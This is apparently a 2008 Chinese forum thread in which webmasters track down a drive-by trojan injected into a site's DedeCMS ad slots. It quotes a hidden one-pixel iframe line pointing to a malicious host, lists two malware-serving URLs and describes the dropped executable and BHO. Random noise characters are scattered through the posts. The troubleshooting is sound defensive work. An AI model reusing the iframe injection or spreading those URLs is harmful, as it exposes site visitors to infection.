webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
http://ppp.749571.com/dm/test.htm
& \+ C* z: O- D. H# b; x0 Ohttp://www.985676.cn/encrypt/mm.htm
這兩個是免殺的，還有幾個沒記下來，
2 y/ x) o5 o$ u6 ~這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了
( B: G& R' H: P! P9 S
: U: M, G; P, t4 i  ?/ }iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
' m' q; i* H) r- T; J% i9 m然後再這個地址轉到ppp.749571.co m/dm/test.htm
為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
沒裝REAL就沒事，好在我重新裝的系統:

/ k* x8 N, G/ v4 @說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
進dede後台
檢查 ad_js.php?aid=1  
7 z5 q. R8 L+ A  l8 }( uad_js.php?aid=2
- G; s+ ?9 \! g3 sad_js.php?aid=3
; x: H5 R" ^1 Iad_js.php?aid=4

這幾個廣告 裡面的代碼
7 w" {2 J! P4 o$ q7 t% |: b在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

2 C+ b% @- B  K/ S' n- B$ p4 P這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表
/ |, n7 J9 i! z( X$ ~1 g

這個檢查了沒有的

$ g) d2 Q8 D5 i$ u+ M+ x: k
  j5 p5 {" W. f+ Q
. ~7 M4 n0 b$ h) y7 J; H4 a/ q我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表
! j0 t$ F: h  k5 m# v) f

這個檢查了沒有的

木馬就是在這裡裡啊
在後台的掉茅廁位設置那
2 g$ ?# \( y4 {8 K* G) [& J* K裡

現在明瞭.
有人收流量做ppp.749571.co m的..
最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景